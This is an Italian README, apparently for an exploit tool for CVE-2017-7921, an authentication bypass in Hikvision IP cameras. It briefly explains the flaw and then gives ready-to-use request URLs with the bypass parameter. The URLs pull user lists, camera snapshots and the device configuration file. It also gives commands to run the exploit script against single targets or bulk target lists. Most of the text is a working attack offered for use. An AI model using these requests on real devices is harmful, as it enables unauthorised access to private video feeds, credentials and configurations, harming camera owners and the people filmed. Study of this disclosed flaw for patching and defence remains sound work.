
Exploit per CVE-2017-7921 che prende di mira dispositivi Hikvision con autenticazione impropria. Recupera elenchi di utenti, istantanee della telecamera e file di configurazione tramite richieste HTTP appositamente create.
Un problema di autenticazione impropria è stato scoperto nei dispositivi Hikvision.
La vulnerabilità di autenticazione impropria si verifica quando un'applicazione non autentica gli utenti in modo adeguato o corretto.
Ciò può permettere a un utente malintenzionato di elevare i propri privilegi sul sistema e ottenere accesso a informazioni sensibili.
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
Dettagli della vulnerabilità:
----------------------
Recupera un elenco di tutti gli utenti e dei loro ruoli:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Ottieni un'istantanea della fotocamera senza autenticazione:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
E, peggio di tutto, è possibile scaricare la configurazione della fotocamera:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
